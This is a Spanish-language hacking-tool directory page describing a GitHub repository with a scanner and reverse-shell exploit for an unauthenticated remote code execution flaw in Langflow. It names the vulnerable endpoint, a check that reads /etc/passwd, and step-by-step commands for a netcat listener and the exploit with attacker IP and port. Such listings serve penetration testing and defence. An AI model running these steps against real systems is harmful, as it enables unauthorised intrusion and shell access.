Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/r0otk3r/cve-2025-3248
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

Escáner y exploit para CVE-2025-3248, una RCE no autenticada en Langflow AI. Incluye un verificador de vulnerabilidades y un generador de payloads de reverse shell para pruebas de seguridad autorizadas.

13hace 1 añoAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-3248: Langflow Ejecución Remota de Código (RCE) Sin Autenticación

Este repositorio contiene dos scripts de Python:

  • LangflowCheck.py: Un escáner que verifica instancias de Langflow AI vulnerables a CVE-2025-3248.
  • exploit.py: Un exploit funcional de reverse shell para objetivos Langflow vulnerables.

Resumen

CVE-2025-3248 es una vulnerabilidad crítica en Langflow AI que permite a atacantes no autenticados ejecutar código Python arbitrario de forma remota mediante un payload manipulado enviado a /api/v1/validate/code.


Archivos

LangflowCheck.py

  • Comprueba si un objetivo es vulnerable intentando ejecutar un payload inofensivo que lee /etc/passwd.
  • Puede escanear un solo objetivo o una lista de URL.
  • Soporta la salida de objetivos vulnerables a un archivo.
  • exploit.py

    • Envía un payload de reverse shell al endpoint vulnerable.
    • Requiere la IP del atacante (lhost) y el puerto del listener (lport).
    • Registra la actividad en exploit.log.
    • Soporta verificación del listener antes de enviar el payload.

    Uso

    1. Instalar Requisitos

    root@kitploit:~
    pip install -r requirements.txt
    

    2. Ejecutar el Escáner de Vulnerabilidades

    URL única

    root@kitploit:~
    python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt
    

    1

    Múltiples Objetivos

    root@kitploit:~
    python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt
    

    tt

    3. Explotar un Objetivo

    Primero, inicie un listener

    root@kitploit:~
    sudo nc -nvlp 4444
    

    l

    Luego, ejecute el exploit:

    root@kitploit:~
    python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444
    

    2

    Debería recibir una shell si el objetivo es vulnerable. root

    ⚠️ Aviso Legal

    Este exploit es solo para fines educativos y pruebas de seguridad autorizadas. No lo utilice contra sistemas que no posea o para los cuales no tenga permiso explícito.


    Canales Oficiales

    • YouTube @rootctf
    • X @r0otk3r
    Descargar herramienta